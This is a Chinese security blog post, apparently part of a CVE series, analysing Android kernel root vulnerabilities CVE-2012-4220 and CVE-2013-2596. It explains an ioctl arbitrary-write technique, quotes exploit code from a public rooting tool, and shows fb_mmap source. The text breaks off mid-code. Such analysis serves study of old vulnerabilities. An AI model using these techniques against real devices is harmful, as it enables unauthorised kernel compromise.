<!DOCTYPE HTML>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">

    

    <title>Android 相关 CVE | </title>
    <meta name="author" content="ssj">
    
    <meta name="description" content="原来 Android 就是这么被 root 的。结尾有彩蛋，Janus 分析（这算什么彩蛋）。
先贴一个Linux源码阅读的网站。
背景知识ioctl()函数ioctl()函数详解
CVE-2012-4220(libdiagexploit)描述
diagchar_core.c in the Qual">
    
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <meta property="og:title" content="Android 相关 CVE">
    <meta property="og:site_name" content="ssj&#39;s blog">

    
    <meta property="og:image" content>
    

    <link rel="icon" type="image/png" href="/favicon.png">
    <link rel="alternate" href="/atom.xml" title="ssj&#39;s blog" type="application/atom+xml">
    <link rel="stylesheet" href="/css/lib/materialize.min.css">
    <link rel="stylesheet" href="/css/lib/font-awesome.min.css">
    <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">

    
        <link rel="stylesheet" href="/css/lib/tranquil-heart.css" type="text/css">
    
    <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
</head>
</html>

<body>
    <img src="/weixin_favicon.png" style="position: absolute; left: -9999px; opacity: 0; filter: alpha(opacity=0);">

    <nav class="pink accent-1">
    <div class="nav-wrapper">
        <a href="#" data-activates="main-menu" class="button-collapse">
            <i class="fa fa-navicon"></i>
        </a>
        <div class="">
            <a href="/" class="brand-logo hide-on-med-and-down">ssj&#39;s blog</a>
            <ul class="right hide-on-med-and-down">
                
                    <li>
                        <a class="menu-home " href="/" >
                            <i class="fa fa-home "></i>
                            
                            Home
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-archive " href="/archives" >
                            <i class="fa fa-archive "></i>
                            
                            Archives
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-category category-menu" href="javascript:;" data-activates="category-menu" >
                            <i class="fa fa-bookmark "></i>
                            
                            Categories
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-reading " href="/reading" >
                            <i class="fa fa-book "></i>
                            
                            Reading
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-about " href="/about" >
                            <i class="fa fa-user "></i>
                            
                            About
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-search modal-trigger " href="#search" >
                            <i class="fa fa-search "></i>
                            
                            Search
                        </a>
                    </li>
                
            </ul>
            <div>
    <ul class="side-nav pink darken-1" id="main-menu">
        
        <li class="side-user">
            <div class="row">
                <div class="col s4 no-padding">
                    <img class="avatar-image circle responsive-img" src="/favicon.png" alt="User Avatar">
                </div>
                <div class="info col s8 valign-wrapper no-padding">
                    <div class="valign">
                        <p class="name">ssj</p>
                        <p class="desc"></p>
                    </div>
                </div>
            </div>
        </li>
        

        
            <li class="no-padding">
                <a class="waves-effect menu-home " href="/" >
                    <i class="fa fa-home "></i>
                    
                    Home
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-archive " href="/archives" >
                    <i class="fa fa-archive "></i>
                    
                    Archives
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-category category-menu" href="javascript:;" data-activates="category-menu" >
                    <i class="fa fa-bookmark "></i>
                    
                    Categories
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-reading " href="/reading" >
                    <i class="fa fa-book "></i>
                    
                    Reading
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-about " href="/about" >
                    <i class="fa fa-user "></i>
                    
                    About
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-search modal-trigger " href="#search" >
                    <i class="fa fa-search "></i>
                    
                    Search
                </a>
            </li>
        
    </ul>

    <ul class="side-nav pink darken-1" id="category-menu">
    

            

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/CTF/">
                    CTF <span class="right">6</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/CTF/Android/">
                    Android <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/CTF/pwn/">
                    pwn <span class="right">5</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/算法/">
                    算法 <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/Ethereum/">
                    Ethereum <span class="right">3</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/Android/">
                    Android <span class="right">8</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/Android/脱壳/">
                    脱壳 <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/Android/马甲包/">
                    马甲包 <span class="right">2</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/面试体验/">
                    面试体验 <span class="right">2</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/面试体验/Android/">
                    Android <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/面试体验/安全/">
                    安全 <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/听戏/">
                    听戏 <span class="right">5</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/CVE/">
                    CVE <span class="right">12</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/CVE/v8/">
                    v8 <span class="right">2</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/CVE/VM/">
                    VM <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/CVE/Docs/">
                    Docs <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/A简历/">
                    A简历 <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/基础知识/">
                    基础知识 <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/二进制漏洞/">
                    二进制漏洞 <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/Cpp/">
                    Cpp <span class="right">1</span></a>
                </a>
            </li>

        

    </ul>
</div>

        </div>
    </div>
</nav>

<div id="search" class="modal search-modal">
    <div class="row">
        <div class="input-field col s12">
              <input id="search-input" type="text">
              <label for="search-input">Search</label>
        </div>

    </div>
    <div id="search-result" class="search-result col s12">

    </div>
</div>


    <main>
        <div class="container main-container">
    <nav class="page-nav hide-on-small-only">
    <div class="nav-wrapper pink">
        <span class="breadcrumb">Current page(Categories)</span>
        
            
    
    
    <a class="breadcrumb" href="/categories/CVE/">CVE</a>


        

        
    </div>
</nav>

<article>
    <div class="card">
        <div class="card-content">
            

            <div class="article-title">
                
    
        <h1>Android 相关 CVE</h1>
    


            </div>
            <time class="pink-link-context" datetime="2020-04-01T08:37:11.000Z"><a href="/2020/04/01/Android相关CVE/">2020-04-01</a></time>

            <span id="busuanzi_container_page_pv" class="read-times-container">
    <i class="fa fa-eye"></i>
    <span id="busuanzi_value_page_pv"></span>
</span>

            
    <div class="tags-row">
        
            <a href="/tags/CVE/" class="chip pink lighten-1">CVE</a>
        
    </div>


            <div class="toc pink-link-context hide-on-med-and-down">
    <ol class="section table-of-contents"><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#背景知识"><span class="section table-of-contents-text">背景知识</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#ioctl-函数"><span class="section table-of-contents-text">ioctl()函数</span></a></li></ol></li><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#CVE-2012-4220-libdiagexploit"><span class="section table-of-contents-text">CVE-2012-4220(libdiagexploit)</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#描述"><span class="section table-of-contents-text">描述</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#漏洞分析"><span class="section table-of-contents-text">漏洞分析</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#利用"><span class="section table-of-contents-text">利用</span></a></li></ol></li><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#CVE-2013-2596-libfb-mem-exploit"><span class="section table-of-contents-text">CVE-2013-2596(libfb_mem_exploit)</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#描述-1"><span class="section table-of-contents-text">描述</span></a></li></ol></li><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#分析利用"><span class="section table-of-contents-text">分析利用</span></a></li><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#CVE-2017-0516"><span class="section table-of-contents-text">CVE-2017-0516</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#描述-2"><span class="section table-of-contents-text">描述</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#漏洞分析-1"><span class="section table-of-contents-text">漏洞分析</span></a></li></ol></li><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#利用-1"><span class="section table-of-contents-text">利用</span></a></li><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#Janus签名漏洞-CVE-2017-13156"><span class="section table-of-contents-text">Janus签名漏洞(CVE-2017-13156)</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#漏洞原理"><span class="section table-of-contents-text">漏洞原理</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#利用-2"><span class="section table-of-contents-text">利用</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#官方修复"><span class="section table-of-contents-text">官方修复</span></a></li></ol></li></ol>
</div>


            <div class="entry pink-link-context">
                <p>原来 Android 就是这么被 root 的。结尾有彩蛋，Janus 分析（这算什么彩蛋）。</p>
<p>先贴一个<a href="https://elixir.bootlin.com/linux/" target="_blank" rel="noopener">Linux源码阅读的网站</a>。</p>
<h2 id="背景知识"><a href="#背景知识" class="headerlink" title="背景知识"></a>背景知识</h2><h3 id="ioctl-函数"><a href="#ioctl-函数" class="headerlink" title="ioctl()函数"></a>ioctl()函数</h3><p><a href="https://blog.csdn.net/gemmem/article/details/7268533" target="_blank" rel="noopener">ioctl()函数详解</a></p>
<h2 id="CVE-2012-4220-libdiagexploit"><a href="#CVE-2012-4220-libdiagexploit" class="headerlink" title="CVE-2012-4220(libdiagexploit)"></a>CVE-2012-4220(libdiagexploit)</h2><h3 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h3><blockquote>
<p>diagchar_core.c in the Qualcomm Innovation Center (QuIC) Diagnostics (aka DIAG) kernel-mode driver for Android 2.3 through 4.2 allows attackers to execute arbitrary code or cause a denial of service (incorrect pointer dereference) via an application that uses crafted arguments in a local diagchar_ioctl call.</p>
</blockquote>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><ol>
<li>对于用户态传递的参数 ioarg 没有检验直接使用。传递一个无效指针即可造成拒绝服务。</li>
<li>对 delay_params 中的 rsp_ptr 以及 num_bytes_ptr 两个用户态的指针仅做了非空判断就直接使用。传递无效指针可造成拒绝服务，传递其他地址可以造成任意地址写入攻击。</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// file: drivers/char/diag/diagchar_core.c</span></span><br><span class="line"><span class="comment">// function: diagchar_ioctl</span></span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (iocmd == DIAG_IOCTL_GET_DELAYED_RSP_ID) &#123;</span><br><span class="line">  struct diagpkt_delay_params *delay_params =</span><br><span class="line">        (struct diagpkt_delay_params *) ioarg;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ((delay_params-&gt;rsp_ptr) &amp;&amp;</span><br><span class="line">   (delay_params-&gt;size == <span class="keyword">sizeof</span>(delayed_rsp_id)) &amp;&amp;</span><br><span class="line">       (delay_params-&gt;num_bytes_ptr)) &#123;</span><br><span class="line">    *((<span class="keyword">uint16_t</span> *)delay_params-&gt;rsp_ptr) =</span><br><span class="line">      DIAGPKT_NEXT_DELAYED_RSP_ID(delayed_rsp_id);</span><br><span class="line">    *(delay_params-&gt;num_bytes_ptr) = <span class="keyword">sizeof</span>(delayed_rsp_id);</span><br><span class="line">    success = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>先看一下相关的代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">uint16_t</span> delayed_rsp_id = <span class="number">1</span>;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> DIAGPKT_MAX_DELAYED_RSP 0xFFFF</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> DIAGPKT_NEXT_DELAYED_RSP_ID(x) \</span></span><br><span class="line">        ((x &lt; DIAGPKT_MAX_DELAYED_RSP) ? x++ : DIAGPKT_MAX_DELAYED_RSP)</span><br></pre></td></tr></table></figure>
<p>需要注意以下几点：</p>
<ol>
<li>delay_params-&gt;rsp_ptr 被当作 16 位的指针处理，写入的内容是 delayed_rsp_id 的值，这个值的范围是 0x2 ~ 0xFFFF。</li>
<li>如果希望向特定的地址写入特定的值，需要获取到当前的 delayed_rsp_id 的值，然后用目标值减去当前值，得到了循环的次数，最后循环发送 ioctl 即可将特定地址的值修改为我们想要的值。</li>
<li>如果 delayed_rsp_id 的值要比目标的值大，则可以使用 num_bytes_ptr 来重置 delayed_rsp_id 的值为 2。</li>
</ol>
<p>写得比较完整的利用代码可以参考 <a href="https://github.com/android-rooting-tools/libdiagexploit">这里</a>，不过这个 exp 有个问题。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">bool</span></span><br><span class="line">inject_value(struct diag_values *data,</span><br><span class="line">             <span class="keyword">int</span> fd, <span class="keyword">void</span> *delayed_rsp_id_address)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">uint16_t</span> delayed_rsp_id_value = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">int</span> i, loop_count, ret;</span><br><span class="line"></span><br><span class="line">  ret = get_current_delayed_rsp_id(fd);</span><br><span class="line">  <span class="keyword">if</span> (ret &lt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  delayed_rsp_id_value = ret;</span><br><span class="line">  data-&gt;original_value = delayed_rsp_id_value;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (delayed_rsp_id_value &gt; data-&gt;value &amp;&amp;</span><br><span class="line">    reset_delayed_rsp_id(fd, delayed_rsp_id_address) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  loop_count = (data-&gt;value - delayed_rsp_id_value) &amp; <span class="number">0xffff</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; loop_count; i++) &#123;</span><br><span class="line">    <span class="keyword">int</span> unused;</span><br><span class="line">    <span class="keyword">if</span> (send_delay_params(fd, (<span class="keyword">void</span> *)data-&gt;address, &amp;unused) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">      <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>代码中，在 delayed_rsp_id_value 比 data-&gt;value 大的时候，会调用 reset_delayed_rsp_id 重置 delayed_rsp_id 计数为 2，但这个时候，并没有修改局部变量的 delayed_rsp_id_value 为 2，导致后面计算的 loop_count 不正确，因此无法正确的写入值。而且写入值的时候，需要注意控制 0 和 1 的出现。比如写入地址的时候，分配一块地址较高内存进行处理会让利用更稳定一些。</p>
<h2 id="CVE-2013-2596-libfb-mem-exploit"><a href="#CVE-2013-2596-libfb-mem-exploit" class="headerlink" title="CVE-2013-2596(libfb_mem_exploit)"></a>CVE-2013-2596(libfb_mem_exploit)</h2><h3 id="描述-1"><a href="#描述-1" class="headerlink" title="描述"></a>描述</h3><blockquote>
<p>Integer overflow in the fb_mmap function in drivers/video/fbmem.c in the Linux kernel before 3.8.9, as used in a certain Motorola build of Android 4.1.2 and other products, allows local users to create a read-write memory mapping for the entirety of kernel memory, and consequently gain privileges, via crafted /dev/graphics/fb0 mmap2 system calls, as demonstrated by the Motochopper pwn program.</p>
</blockquote>
<p>fb_mmap 函数导致的整数溢出，可以使得用户模式的程序把整个内核以可读写的方式映射到用户模式。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">vm_area_struct</span> &#123;</span></span><br><span class="line">    <span class="comment">/* The first cache line has the info for VMA tree walking. */</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> vm_start;        <span class="comment">/* Our start address within vm_mm. */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> vm_end;        <span class="comment">/* The first byte after our end address</span></span><br><span class="line"><span class="comment">                       within vm_mm. */</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* linked list of VM areas per task, sorted by address */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">vm_area_struct</span> *<span class="title">vm_next</span>, *<span class="title">vm_prev</span>;</span></span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">rb_node</span> <span class="title">vm_rb</span>;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * Largest free memory gap in bytes to the left of this VMA.</span></span><br><span class="line"><span class="comment">     * Either between this VMA and vma-&gt;vm_prev, or between one of the</span></span><br><span class="line"><span class="comment">     * VMAs below us in the VMA rbtree and its -&gt;vm_prev. This helps</span></span><br><span class="line"><span class="comment">     * get_unmapped_area find a free area of the right size.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> rb_subtree_gap;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Second cache line starts here. */</span></span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">mm_struct</span> *<span class="title">vm_mm</span>;</span>    <span class="comment">/* The address space we belong to. */</span></span><br><span class="line">    <span class="keyword">pgprot_t</span> vm_page_prot;        <span class="comment">/* Access permissions of this VMA. */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> vm_flags;        <span class="comment">/* Flags, see mm.h. */</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * For areas with an address space and backing store,</span></span><br><span class="line"><span class="comment">     * linkage into the address_space-&gt;i_mmap interval tree, or</span></span><br><span class="line"><span class="comment">     * linkage of vma in the address_space-&gt;i_mmap_nonlinear list.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="class"><span class="keyword">struct</span> &#123;</span></span><br><span class="line">            <span class="class"><span class="keyword">struct</span> <span class="title">rb_node</span> <span class="title">rb</span>;</span></span><br><span class="line">            <span class="keyword">unsigned</span> <span class="keyword">long</span> rb_subtree_last;</span><br><span class="line">        &#125; linear;</span><br><span class="line">        <span class="class"><span class="keyword">struct</span> <span class="title">list_head</span> <span class="title">nonlinear</span>;</span></span><br><span class="line">    &#125; shared;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * A file's MAP_PRIVATE vma can be in both i_mmap tree and anon_vma</span></span><br><span class="line"><span class="comment">     * list, after a COW of one of the file pages.    A MAP_SHARED vma</span></span><br><span class="line"><span class="comment">     * can only be in the i_mmap tree.  An anonymous MAP_PRIVATE, stack</span></span><br><span class="line"><span class="comment">     * or brk vma (with NULL file) can only be in an anon_vma list.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">list_head</span> <span class="title">anon_vma_chain</span>;</span> <span class="comment">/* Serialized by mmap_sem &amp;</span></span><br><span class="line"><span class="comment">                      * page_table_lock */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">anon_vma</span> *<span class="title">anon_vma</span>;</span>    <span class="comment">/* Serialized by page_table_lock */</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Function pointers to deal with this struct. */</span></span><br><span class="line">    <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">vm_operations_struct</span> *<span class="title">vm_ops</span>;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Information about our backing store: */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> vm_pgoff;        <span class="comment">/* Offset (within vm_file) in PAGE_SIZE</span></span><br><span class="line"><span class="comment">                       units, *not* PAGE_CACHE_SIZE */</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">file</span> * <span class="title">vm_file</span>;</span>        <span class="comment">/* File we map to (can be NULL). */</span></span><br><span class="line">    <span class="keyword">void</span> * vm_private_data;        <span class="comment">/* was vm_pte (shared mem) */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifndef</span> CONFIG_MMU</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">vm_region</span> *<span class="title">vm_region</span>;</span>    <span class="comment">/* NOMMU mapping region */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> CONFIG_NUMA</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">mempolicy</span> *<span class="title">vm_policy</span>;</span>    <span class="comment">/* NUMA policy for the VMA */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">static</span> <span class="keyword">int</span></span><br><span class="line">fb_mmap(struct file *file, struct vm_area_struct * vma)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">fb_info</span> *<span class="title">info</span> = <span class="title">file_fb_info</span>(<span class="title">file</span>);</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">fb_ops</span> *<span class="title">fb</span>;</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> off;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> start;</span><br><span class="line">    u32 len;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!info)</span><br><span class="line">        <span class="keyword">return</span> -ENODEV;</span><br><span class="line">    <span class="keyword">if</span> (vma-&gt;vm_pgoff &gt; (~<span class="number">0U</span>L &gt;&gt; PAGE_SHIFT))</span><br><span class="line">        <span class="keyword">return</span> -EINVAL;</span><br><span class="line">    off = vma-&gt;vm_pgoff &lt;&lt; PAGE_SHIFT;</span><br><span class="line">    fb = info-&gt;fbops;</span><br><span class="line">    <span class="keyword">if</span> (!fb)</span><br><span class="line">        <span class="keyword">return</span> -ENODEV;</span><br><span class="line">    mutex_lock(&amp;info-&gt;mm_lock);</span><br><span class="line">    <span class="keyword">if</span> (fb-&gt;fb_mmap) &#123;</span><br><span class="line">        <span class="keyword">int</span> res;</span><br><span class="line">        res = fb-&gt;fb_mmap(info, vma);</span><br><span class="line">        mutex_unlock(&amp;info-&gt;mm_lock);</span><br><span class="line">        <span class="keyword">return</span> res;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* frame buffer memory */</span></span><br><span class="line">    start = info-&gt;fix.smem_start;</span><br><span class="line">    len = PAGE_ALIGN((start &amp; ~PAGE_MASK) + info-&gt;fix.smem_len);</span><br><span class="line">    <span class="keyword">if</span> (off &gt;= len) &#123;</span><br><span class="line">        <span class="comment">/* memory mapped io */</span></span><br><span class="line">        off -= len;</span><br><span class="line">        <span class="keyword">if</span> (info-&gt;var.accel_flags) &#123;</span><br><span class="line">            mutex_unlock(&amp;info-&gt;mm_lock);</span><br><span class="line">            <span class="keyword">return</span> -EINVAL;</span><br><span class="line">        &#125;</span><br><span class="line">        start = info-&gt;fix.mmio_start;</span><br><span class="line">        len = PAGE_ALIGN((start &amp; ~PAGE_MASK) + info-&gt;fix.mmio_len);</span><br><span class="line">    &#125;</span><br><span class="line">    mutex_unlock(&amp;info-&gt;mm_lock);</span><br><span class="line">    start &amp;= PAGE_MASK;</span><br><span class="line">    <span class="comment">// 这里可以控制绕过。</span></span><br><span class="line">    <span 